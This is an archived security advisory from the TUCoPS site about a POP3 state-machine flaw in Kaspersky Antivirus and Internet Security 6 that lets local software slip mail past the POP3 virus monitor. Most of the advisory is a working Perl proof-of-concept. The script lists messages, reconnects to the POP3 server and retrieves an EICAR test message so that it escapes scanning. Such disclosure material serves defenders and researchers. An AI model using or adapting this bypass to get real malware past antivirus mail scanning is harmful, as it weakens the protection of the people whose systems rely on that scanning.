Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: b06-2448.htm

Kaspersky antivirus 6: POP3 state machine error



Kaspersky antivirus 6: POP3 state machine error
Kaspersky antivirus 6: POP3 state machine error



Kaspersky antivirus 6=0D
Kaspersky internet security 6=0D
=0D
www.kaspersky.com=0D 
=0D
Vulnerable Systems: KAV6, KIS6=0D
=0D
Detail:=0D
=0D
The vulnerability is caused due to POP3 state machine error in POP3 monitor (Kaspersky Mail-antivirus). =0D
=0D
Any mailicious software on local computer can bypass POP3 virus monitor. =0D
=0D
Solution:=0D
=0D
There is no known solution.=0D
=0D
Exploit code:=0D
=0D
Put eicar.com test file into your mailbox using subject 'eicar', correct this perl script (change POP3-server address, your acount name and the pasword) and run the script with ActiveState Perl 5.8:=0D
=0D
#! /usr/bin/perl -w=0D
=0D
use IO::Socket::INET;=0D
use strict;=0D
=0D
my( $h_srv, $h_port, $h_user, $h_pwd ) = ( YOUR.POP3.SERVER.IP/FQDN, 'pop(110)',=0D
                                           YOUR-ACCOUNT, YOUR-PASSWORD );=0D
my( $g_str, $g_trc_out, $g_trc_in ) = ( '', 0, 0 );=0D
=0D
my $server = pop3_connect();=0D
=0D
sendthem( $server, "LIST" );=0D
die "bad LIST command: $g_str" unless read_line( $server ) =~ /^\+OK/;=0D
=0D
my @lst;=0D
for( ;; ) {=0D
    my $str = read_line( $server );=0D
    last if $str =~ /^.$/;=0D
    push @lst, $1 if $str =~ /^(\d+)\s+/;=0D
}=0D
syswrite STDOUT, "msgs: ".(join ' ', @lst)."\n";=0D 
=0D
# !!! comment next line to have it working ;)=0D
$server = pop3_connect( $server );=0D
=0D
foreach( @lst ) {=0D
    my $uidl = $_;=0D
    sendthem( $server, "RETR $uidl" );=0D
    die "bad RETR command: $g_str" unless read_line( $server ) =~ /^\+OK/;=0D
    my $msg = '';=0D
    for( ;; ) {=0D
        my $str = read_line( $server );=0D
        last if $str =~ /^.$/;=0D
        $msg .= $str."\n";=0D
    }=0D
    syswrite STDOUT, "got: $uidl (".(length $msg)." bytes)\n";=0D
    syswrite STDOUT, $msg if $msg =~ /eicar/i;=0D
}=0D
=0D
sub pop3_connect {=0D
    my( $sock ) = @_;=0D
=0D
    syswrite STDOUT, "connecting to $h_srv:$h_port (as $h_user)\n";=0D
=0D
    $sock->close if $sock;=0D
    $sock = IO::Socket::INET->new( PeerAddr => $h_srv,=0D
                                   PeerPort => $h_port,=0D
                                   Proto    => 'tcp' );=0D
    die "socket: $!" unless $sock;=0D
    die "wrong answer: $g_str" unless read_line( $sock ) =~ /^\+OK/;=0D
    sendthem( $sock, "USER $h_user" );=0D
    die "bad account: $g_str" unless read_line( $sock ) =~ /^\+OK/;=0D
    sendthem( $sock, "PASS $h_pwd" );=0D
    die "bad password: $g_str" unless read_line( $sock ) =~ /^\+OK/;=0D
    $sock;=0D
}=0D
=0D
sub sendthem {=0D
    my $sock = shift;=0D
    foreach( @_ ) {=0D
        my @a = split //, $_;=0D
        syswrite STDOUT, "cln: " if $g_trc_out;=0D
        foreach( @a ) {=0D
            sendone( $sock, $_ );=0D
        }=0D
        sendone( $sock, "\r" );=0D
        sendone( $sock, "\n" );=0D
    }=0D
}=0D
=0D
sub sendone {=0D
    my( $sock, $v ) = @_;=0D
    die "send: " if length $v != $sock->syswrite( $v );=0D
    syswrite STDOUT, $v if $g_trc_out;=0D
}=0D
=0D
sub read_line {=0D
    my( $sock ) = @_;=0D
    my $str = '';=0D
    for( ;; ) {=0D
        my $v = '';=0D
        my $r = $sock->sysread( $v, 1 );=0D
        die 'EOF reading headers!' unless $r;=0D
        last if $v eq "\n";=0D
        next if $v eq "\r";=0D
        $str .= $v;=0D
    }=0D
    syswrite STDOUT, "srv: $str\r\n" if $g_trc_out;=0D
    $g_str = $str;=0D
}=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH